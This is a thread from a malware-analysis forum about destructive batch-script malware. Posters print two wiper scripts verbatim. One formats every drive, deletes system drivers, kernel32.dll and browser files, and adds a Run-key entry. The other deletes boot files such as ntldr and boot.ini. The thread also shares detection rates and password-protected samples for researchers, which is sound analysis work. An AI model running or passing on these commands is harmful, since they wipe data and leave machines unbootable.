A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #5621  by EP_X0FF
 Thu Mar 24, 2011 11:11 am
Created with free BatToExeConverter program.

This is dangerous to system program created by script-kiddie.
For example it's trying to delete all installed drivers and re-format drives. All this is through bat and vbs scripts.
FORMAT A: /FS:NTFS /V:(A:) /X /P:1 /y >nul
FORMAT B: /FS:NTFS /V:(B:) /X /P:1 /y >nul
FORMAT C: /FS:NTFS /V:(C:) /X /P:1 /y >nul
FORMAT D: /FS:NTFS /V:(D:) /X /P:1 /y >nul
FORMAT E: /FS:NTFS /V:(E:) /X /P:1 /y >nul
FORMAT F: /FS:NTFS /V:(F:) /X /P:1 /y >nul
FORMAT G: /FS:NTFS /V:(G:) /X /P:1 /y >nul
FORMAT H: /FS:NTFS /V:(H:) /X /P:1 /y >nul
FORMAT I: /FS:NTFS /V:(I:) /X /P:1 /y >nul
FORMAT J: /FS:NTFS /V:(J:) /X /P:1 /y >nul
FORMAT K: /FS:NTFS /V:(K:) /X /P:1 /y >nul
FORMAT M: /FS:NTFS /V:(M:) /X /P:1 /y >nul
FORMAT N: /FS:NTFS /V:(N:) /X /P:1 /y >nul
FORMAT O: /FS:NTFS /V:(O:) /X /P:1 /y >nul
FORMAT P: /FS:NTFS /V:(P:) /X /P:1 /y >nul
FORMAT Q: /FS:NTFS /V:(Q:) /X /P:1 /y >nul
FORMAT R: /FS:NTFS /V:(R:) /X /P:1 /y >nul
FORMAT S: /FS:NTFS /V:(S:) /X /P:1 /y >nul
FORMAT T: /FS:NTFS /V:(T:) /X /P:1 /y >nul
FORMAT U: /FS:NTFS /V:(U:) /X /P:1 /y >nul
FORMAT V: /FS:NTFS /V:(V:) /X /P:1 /y >nul
FORMAT W: /FS:NTFS /V:(W:) /X /P:1 /y >nul
FORMAT X: /FS:NTFS /V:(X:) /X /P:1 /y >nul
FORMAT Z: /FS:NTFS /V:(Z:) /X /P:1 /y >nul
del /f /q "C:\Program Files\Internet Explorer\iexplore.exe"

del /f /q "C:\Program Files\Mozilla Firefox\*.*"

del /f /q "C:\WINDOWS\system32\kernel32.dll"

Set load=HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Reg Add "%load%" /v "BSOD" /t "REG_SZ" /d "C:\Documents and Settings\User\Desktop\aim_bot47_48.exe" /f > nul
Del /q /s /f "%SystemRoot%\System32\Drivers\*.*"
Thread renamed to be more descriptive.
 #6318  by Xylitol
 Sat May 14, 2011 11:33 am
Win32.KillFiles batch2exe powered

original:
20/42 >> 47.6%
http://www.virustotal.com/file-scan/rep ... 1305286943

unpacked:
8/43 >> 18.6%
https://www.virustotal.com/file-scan/re ... 1305377088

i lol'd:
Image
Attachments
See archive comment for password
(338.36 KiB) Downloaded 77 times
 #18530  by EP_X0FF
 Fri Mar 15, 2013 3:19 am
Another work of script-kiddie in full meaning of this term. Just for lulz.

https://www.virustotal.com/en/file/bd21 ... /analysis/
Code: Select all
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Attachments
pass: malware
(353 Bytes) Downloaded 50 times